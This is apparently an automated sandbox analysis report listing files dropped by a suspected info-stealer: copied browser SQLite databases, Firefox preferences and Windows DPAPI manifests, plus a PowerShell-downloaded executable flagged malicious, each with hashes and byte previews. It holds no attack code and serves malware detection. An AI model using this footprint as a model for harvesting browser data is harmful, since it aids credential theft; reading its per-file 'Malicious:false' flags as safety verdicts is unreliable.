                                                                                                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\37QQIEKNGVAA\K6XT0Z

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):9571
                                                                                                                                                                                                                                                  Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                  MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                  SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                  SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                  SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                  C:\ProgramData\37QQIEKNGVAA\KFUSRIECT

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\37QQIEKNGVAA\MY58GD

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\37QQIEKNGVAA\MYUKN7

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2947
                                                                                                                                                                                                                                                  Entropy (8bit):5.120077314818075
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
                                                                                                                                                                                                                                                  MD5:C7E301D9DD77A21C1CDBD73A63AF205C
                                                                                                                                                                                                                                                  SHA1:715D25AA0C06B2AD162F52A8DE06FB5040C389B1
                                                                                                                                                                                                                                                  SHA-256:239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
                                                                                                                                                                                                                                                  SHA-512:B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t

                                                                                                                                                                                                                                                  C:\ProgramData\37QQIEKNGVAA\QQ9RQQ

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):24008
                                                                                                                                                                                                                                                  Entropy (8bit):6.062446965815151
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
                                                                                                                                                                                                                                                  MD5:6AEAEBF650EFC93CD3B6670A05724FE8
                                                                                                                                                                                                                                                  SHA1:A4FE07E6C678AC8D4DC095997DB5043668D103B4
                                                                                                                                                                                                                                                  SHA-256:C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
                                                                                                                                                                                                                                                  SHA-512:5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                  • Filename: nB52P46OJD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: xoJxSAotVM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: fim3BhyKXP.gif, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: TMX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: ljwIPDSwFi.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  • Filename: jE4zclRJU2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q..Q..Q..E...S..E...]..Q..t..E...Z..E...P..E...S..E.S.P..E...P..RichQ..................PE..d....Q.!..........",.........$......................................................Bn....`A.........................................<..X....<..x....p..(....`..h....<...!......(....8..T............................0..............(1..0............................text...p........................... ..`.rdata..>....0......................@..@.data...`....P.......0..............@....pdata..h....`.......2..............@..@.rsrc...(....p.......4..............@..@.reloc..(............:..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\37QQIEKNGVAA\WLFCTR

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1468
                                                                                                                                                                                                                                                  Entropy (8bit):5.0065780470180306
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:p/o2e8GFp8PvMu0Vnu7vFPvJ8+FXg0Mej39ImlQu/kKcCEF4wflBX0FCUK:22e8+8PvMu0VnuRPvJ8+FXgMtImlx3cd
                                                                                                                                                                                                                                                  MD5:E68A33BDAF7AEBE6D5BBBCEFDED6AC5C
                                                                                                                                                                                                                                                  SHA1:A1120341BB4452FCA47EB5EA8FA62A08BFC48073
                                                                                                                                                                                                                                                  SHA-256:A5DC5B9F31D69E6F65F405EF4E187BAB262746AAAC08E95C195AA77A0B310DE1
                                                                                                                                                                                                                                                  SHA-512:69E1A60C0FFE8AA19B55FABE47801EEEA7CF4C84E426318D8B7BFFAF09A14FC5F569573BE30753D354B604911A616C231F485B08C3778E0A214F7E3DC9C21D2C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="artbaker".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="artbaker".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Cryptography-CryptoConfig-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration xmlns="">.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>..

                                                                                                                                                                                                                                                  C:\ProgramData\37QQIEKNGVAA\WTRQIE

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4533
                                                                                                                                                                                                                                                  Entropy (8bit):5.1021772201912805
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
                                                                                                                                                                                                                                                  MD5:477F010FDB6BD5E5E57D6DEC5449F2FB
                                                                                                                                                                                                                                                  SHA1:73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
                                                                                                                                                                                                                                                  SHA-256:2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
                                                                                                                                                                                                                                                  SHA-512:3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V

                                                                                                                                                                                                                                                  C:\ProgramData\37QQIEKNGVAA\Y5FK6F

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                  Entropy (8bit):1.3073787935088113
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrr:KooCEYhgYEL0In
                                                                                                                                                                                                                                                  MD5:762BE36507095909ED00A12FD40C1F37
                                                                                                                                                                                                                                                  SHA1:977FE1E354872CA7BE99FE44B965E8BA5895DF86
                                                                                                                                                                                                                                                  SHA-256:CBA23D793FC51AE9D7A56C00E04F344E7BA521A8978B42CAAB7F6FD62E856A0D
                                                                                                                                                                                                                                                  SHA-512:76A02AC7CAAD52C5AC211CDDFEF58FA9F596400B844FD3B52AC4D47BAB510FD2592908FAFB4FE3F47F7CB9BB577833DF1199C231F9B4387B5996D17161B341D9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3fe2931d, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                  Entropy (8bit):0.422192046466409
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:RSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Raza/vMUM2Uvz7DO
                                                                                                                                                                                                                                                  MD5:EA74509996D8B9631510CEA39D4D9789
                                                                                                                                                                                                                                                  SHA1:0AE5D14899CAC305C7B4E4B9466728443B400374
                                                                                                                                                                                                                                                  SHA-256:87CBCE1E9B2C7F23528276183B8009543F4DE91E20AF1F3FEB4B69BFAA6DD032
                                                                                                                                                                                                                                                  SHA-512:364E67D156740ED4DC8ECBEDD12781D217E2F7AB455688123778F19BE3625A9674A073D774C75729C32FA4B93120B1DED1DF8D80216DFEE1DA8BF04406D35E84
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:?..... .......A.......X\...;...{......................0.!..........{A......|a.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.....................................,.....|.....................1.....|a..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                  Entropy (8bit):0.07742873359674843
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:NSYeA4QpYGjjn13a/XU34+8tAllcVO/lnlZMxZNQl:IzbGj53qE34+8tAOewk
                                                                                                                                                                                                                                                  MD5:2307E217EB115FD59E5B884560D68D35
                                                                                                                                                                                                                                                  SHA1:76173431BE6145B2E5A0525F296C13F9EFD7AD2E
                                                                                                                                                                                                                                                  SHA-256:29401B1214552EE7A7A18D533C617F62C694DB81EA56E545942562930CAA5C8B
                                                                                                                                                                                                                                                  SHA-512:3B94D49505D6C8679E2FD8D047C4D41CFE76EFF7836A5472E02151BA3CF3B41841FEB25593118585F8828C304672674C16BB3FCF8185F5EDA06EE6601F0AA096
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.>3.....................................;...{.......|a......{A..............{A......{A..........{A]...................1.....|a.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):71954
                                                                                                                                                                                                                                                  Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                  Entropy (8bit):3.1291579496462614
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:kKJxLi9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:hDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                  MD5:B2527670A2753E48BFC51AA77337F0AC
                                                                                                                                                                                                                                                  SHA1:B4C1ACE1A918A3F1D49AC8F85A8EB6252E16D32D
                                                                                                                                                                                                                                                  SHA-256:0E7AB864EEF7AB0A6E31BAACD2A38EF1DB8164E838281C1A6F4ACB33DBB47028
                                                                                                                                                                                                                                                  SHA-512:2DE5403B74A8454C3AC86CF7E4571D361217A3FD443184C5BFC8E446C6FE85DABEF08592B72038FA99CBE2C44A84A7B4BA721C24F28C9CA14C07D29C02A07A03
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:p...... ........hoT..P..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):978099
                                                                                                                                                                                                                                                  Entropy (8bit):7.973423478278547
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:pwalP8xAuX4r2UW6hFgpnzmhmwMpG/lhX1/tnn2K2:5LWjcFDtv1/tnn2K2
                                                                                                                                                                                                                                                  MD5:27B18A5E8BDAA950AF93633A821C2BFA
                                                                                                                                                                                                                                                  SHA1:5763FB49A0DCDB77959CF503F008B6F863C1E92D
                                                                                                                                                                                                                                                  SHA-256:B9C936992C244AB9864CF92BFE3365F7316B306846A4827AA91740DA78DEE813
                                                                                                                                                                                                                                                  SHA-512:EEAA5CD8FF38655B8C4C1105D05862722B660E5EB2A9C74CC08D6EB3D5678BA8803ABD3D0F6CD62B3A385017C19373DA87BF0F1093A5AEAABAC8777FA0C2A144
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...(...B...8............@.......................................@.................................@...........V...........k...H....`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...V...........................@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\json[1].json

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1787
                                                                                                                                                                                                                                                  Entropy (8bit):5.372105531384629
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:SfNaoCGedFTECGNFfNaoCXIrCX2fNaoCdCmfNaoCrnE0UrU0U8CrH:6NnCRTECoNnC0CuNnCdCONnCrnE0UrUB
                                                                                                                                                                                                                                                  MD5:EC64ED4E97B42DE8FCAFD1DCF793F493
                                                                                                                                                                                                                                                  SHA1:3305792D9561C4E75CE2CBBD3B7DADEB89D4306A
                                                                                                                                                                                                                                                  SHA-256:723B64E6DCBF95F5593BB63CA034AE7BC118A2AEBDB746CA7943E392DA349C25
